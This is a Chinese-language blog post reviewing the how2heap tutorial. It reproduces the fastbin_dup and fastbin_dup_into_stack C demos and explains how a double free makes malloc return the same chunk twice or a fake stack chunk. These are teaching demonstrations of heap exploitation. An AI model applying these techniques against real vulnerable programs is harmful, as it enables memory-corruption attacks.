how2heap总结

Posted 2020-10-17

今天，让我们来总结下how2heap，之前粗略过了一下，但最近发现还是有很多细节不太清楚，于是现在回头来重新调试下how2heap。

就按顺序来吧。

0x01 fastbin_dup：

源码:

 1 #include <stdio.h>
 2 #include <stdlib.h>
 3 
 4 int main()
 5 {
 6     fprintf(stderr, "This file demonstrates a simple double-free attack with fastbins.\\n");
 7 
 8     fprintf(stderr, "Allocating 3 buffers.\\n");
 9     int *a = malloc(8);
10     int *b = malloc(8);
11     int *c = malloc(8);
12 
13     fprintf(stderr, "1st malloc(8): %p\\n", a);
14     fprintf(stderr, "2nd malloc(8): %p\\n", b);
15     fprintf(stderr, "3rd malloc(8): %p\\n", c);
16 
17     fprintf(stderr, "Freeing the first one...\\n");
18     free(a);
19 
20     fprintf(stderr, "If we free %p again, things will crash because %p is at the top of the free list.\\n", a, a);
21     // free(a);
22 
23     fprintf(stderr, "So, instead, we‘ll free %p.\\n", b);
24     free(b);
25 
26     fprintf(stderr, "Now, we can free %p again, since it‘s not the head of the free list.\\n", a);
27     free(a);
28 
29     fprintf(stderr, "Now the free list has [ %p, %p, %p ]. If we malloc 3 times, we‘ll get %p twice!\\n", a, b, a, a);
30     fprintf(stderr, "1st malloc(8): %p\\n", malloc(8));
31     fprintf(stderr, "2nd malloc(8): %p\\n", malloc(8));
32     fprintf(stderr, "3rd malloc(8): %p\\n", malloc(8));
33 }

接下来我们来运行下这个程序：

可以发现这是一个double free的分析，这个是fastbin内存分配的分析，fastbin是先入后出，free1 —— free2 —— free1，这样在使用的时候就是malloc1 —— malloc2 —— malloc1 —     — malloc2 —— malloc1……循环下去，可以再分配试一试。

 

0x02 fastbin_dup_into_stack：

源码:

 1 #include <stdio.h>
 2 #include <stdlib.h>
 3 
 4 int main()
 5 {
 6     fprintf(stderr, "This file extends on fastbin_dup.c by tricking malloc into\\n"
 7            "returning a pointer to a controlled location (in this case, the stack).\\n");
 8 
 9     unsigned long long stack_var;
10 
11     fprintf(stderr, "The address we want malloc() to return is %p.\\n", 8+(char *)&stack_var);
12 
13     fprintf(stderr, "Allocating 3 buffers.\\n");
14     int *a = malloc(8);
15     int *b = malloc(8);
16     int *c = malloc(8);
17 
18     fprintf(stderr, "1st malloc(8): %p\\n", a);
19     fprintf(stderr, "2nd malloc(8): %p\\n", b);
20     fprintf(stderr, "3rd malloc(8): %p\\n", c);
21 
22     fprintf(stderr, "Freeing the first one...\\n");
23     free(a);
24 
25     fprintf(stderr, "If we free %p again, things will crash because %p is at the top of the free list.\\n", a, a);
26     // free(a);
27 
28     fprintf(stderr, "So, instead, we‘ll free %p.\\n", b);
29     free(b);
30 
31     fprintf(stderr, "Now, we can free %p again, since it‘s not the head of the free list.\\n", a);
32     free(a);
33 
34     fprintf(stderr, "Now the free list has [ %p, %p, %p ]. "
35         "We‘ll now carry out our attack by modifying data at %p.\\n", a, b, a, a);
36     unsigned long long *d = malloc(8);
37 
38     fprintf(stderr, "1st malloc(8): %p\\n", d);
39     fprintf(stderr, "2nd malloc(8): %p\\n", malloc(8));
40     fprintf(stderr, "Now the free list has [ %p ].\\n", a);
41     fprintf(stderr, "Now, we have access to %p while it remains at the head of the free list.\\n"
42         "so now we are writing a fake free size (in this case, 0x20) to the stack,\\n"
43         "so that malloc will think there is a free chunk there and agree to\\n"
44         "return a pointer to it.\\n", a);
45     stack_var = 0x20;
46 
47     fprintf(stderr, "Now, we overwrite the first 8 bytes of the data at %p to point right before the 0x20.\\n", a);
48     *d = (unsigned long long) (((char*)&stack_var) - sizeof(d));
49 
50     fprintf(stderr, "3rd malloc(8): %p, putting the stack address on the free list\\n", malloc(8));
51     fprintf(stderr, "4th malloc(8): %p\\n", malloc(8));
52 }

 接下来我们来运行下这个程序：

 

 会发现再次申请的时候就把我们伪造的栈空间当malloc来申请了，这其中的要点为将stack_var = 0x20,然后将stack_var -8 的地址赋值到*d处，也就是fastbin的fd处。再次maollc到指向stack+8的堆。